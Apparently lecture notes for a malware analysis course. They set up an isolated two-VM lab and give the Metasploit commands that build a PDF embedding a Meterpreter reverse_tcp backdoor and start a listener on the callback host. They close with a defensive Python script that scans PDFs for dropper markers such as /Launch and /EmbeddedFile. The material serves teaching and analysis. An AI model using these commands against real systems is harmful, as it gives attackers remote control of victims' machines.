A good defense frequently demands an understanding of the offense. In this lecture we begin building our malware analysis lab: two VMs connected to each other through the VirtualBox Internal Network feature, which gives them a private network with no path to the host or the outside world, so the malware we detonate stays inside the lab.
One of these is a VM based on the Kali Linux distribution, maintained by the Offensive Security training and consulting firm. We will use the popular Metasploit Framework to build an attack that embeds a backdoor (an executable payload) in a PDF document intended for delivery to a target. In our example, reconnaissance has already identified the target's host operating system and application versions, which is what lets us choose a matching exploit module and payload.
The other VM simulates the target's environment: the version of Windows and the other productivity applications the target is known to use.
In the demo we build the attack, and in doing so explore some of the features Metasploit offers as an encyclopedia of exploits. We also demonstrate building a simulated attack surface in which to execute the malware.
Slides: lecture-w02-1.pdf (PDF)
Commands I used to build the malicious PDF:
# Search for exploit modules whose name or description mentions "adobe_pdf"
msf > search type:exploit platform:windows adobe_pdf
# Select the module we will build the attack from
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
# Show the module's description, targets and references
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > info
# Select the payload to embed: a staged Meterpreter that connects back to us
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
# Show the exploit's and the payload's options (LHOST and LPORT are the ones that matter here)
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > show options
# LHOST is where the payload calls back: this Kali VM's address on the internal network, i.e. the command-and-control (C2) host
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.3.12
# Generate the PDF (a file-format module writes a file rather than attacking a remote host)
msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
Commands I used to start up the listener:
# Select the generic handler that catches the reverse connection
msf > use exploit/multi/handler
# The handler's payload must match the one embedded in the PDF
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# Show the options available to configure in the module
msf exploit(multi/handler) > show options
# Same LHOST (and LPORT) as configured when building the PDF
msf exploit(multi/handler) > set LHOST 192.168.3.12
# "exploit" here starts the listener; it waits for the target to open the PDF
msf exploit(multi/handler) > exploit
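Once the PDF exists, the analysis side of the lab wants a way to confirm what is inside it before detonating it on the Windows VM. The triage script below is an added example, not code from the lecture, the slides or Metasploit: it looks for the markers an embedded-executable PDF leaves (/EmbeddedFile, /Launch, /OpenAction and the like) and, unlike a plain grep, first inflates FlateDecode streams and decodes #xx name escapes, which is where such markers hide. The marker list is an assumption modelled on pdfid-style checks rather than anything the module defines, and the PDF it scans is constructed inline so the script runs offline.

```python
"""Triage a PDF for the markers that an embedded-executable dropper leaves behind.

Added example for this lecture, not code from the course or from Metasploit.
The marker list is an assumption modelled on pdfid-style checks.
"""
import re
import sys
import zlib

# Keys worth flagging (assumed list). Each value is a bytes regex.
SUSPICIOUS = {
    "EmbeddedFile": rb"/EmbeddedFiles?\b",  # embedded file stream / name tree (the dropped EXE)
    "Launch":       rb"/Launch\b",          # /Launch action: run an external program
    "OpenAction":   rb"/OpenAction\b",      # action triggered when the document opens
    "AA":           rb"/AA\b",              # additional actions (page open/close, etc.)
    "JavaScript":   rb"/JavaScript\b",
    "JS":           rb"/JS\b",
}

_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes so an obfuscated /J#61vaScript matches /JavaScript.

    Simplification: escapes are decoded everywhere, not only inside name objects."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Replace every stream body that inflates as zlib/FlateDecode with its plaintext.

    Objects hidden in compressed object streams become visible to the scan;
    bodies that are not Flate data (images, the embedded EXE) are left untouched."""
    def _inflate(m):
        try:
            # decompressobj() ignores trailing bytes such as a stray \r before endstream
            return b"stream\n" + zlib.decompressobj().decompress(m.group(1)) + b"\nendstream"
        except zlib.error:
            return m.group(0)
    return _STREAM.sub(_inflate, data)


def scan_pdf(data: bytes, deobfuscate: bool = True) -> dict:
    """Count suspicious keys. deobfuscate=False is the naive grep, kept for comparison."""
    text = normalize_names(inflate_streams(data)) if deobfuscate else data
    hits = {}
    for name, pattern in SUSPICIOUS.items():
        n = len(re.findall(pattern, text))
        if n:
            hits[name] = n
    return hits


def build_sample_pdf() -> bytes:
    """Constructed sample, not a real Metasploit artefact.

    A minimal PDF whose /Launch action lives inside a Flate-compressed stream and
    whose embedded-file names use #46 ('F') escapes, so a plain grep sees only
    /OpenAction. Object-stream bookkeeping (/N, /First) is omitted for brevity."""
    hidden = b"6 0 obj << /Type /Action /S /Launch /F (cmd.exe) >> endobj\n"
    packed = zlib.compress(hidden)
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R"
        b" /Names << /Embedded#46iles 4 0 R >> >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n",
        b"3 0 obj << /Type /Embedded#46ile /Length 4 >> stream\nMZ\x90\x00\nendstream endobj\n",
        b"4 0 obj << /Names [(template.pdf) 5 0 R] >> endobj\n",
        b"5 0 obj << /Type /Filespec /F (template.pdf) /EF << /F 3 0 R >> >> endobj\n",
        b"7 0 obj << /Type /ObjStm /Filter /FlateDecode /Length %d >> stream\n" % len(packed),
        packed,
        b"\nendstream endobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ])


if __name__ == "__main__":
    # Usage: python3 pdf_triage.py malicious.pdf   (no argument: scan the built-in sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pdf()
    print("naive grep      :", scan_pdf(blob, deobfuscate=False))
    print("after deobfusc. :", scan_pdf(blob))
```

Run against the PDF the module wrote, the interesting comparison is the gap between the two lines of output: anything that appears only after deobfuscation was deliberately hidden from casual inspection. The script does not parse the PDF object graph, so it cannot say which object a marker belongs to; for that, hand the file to a full parser after this first pass.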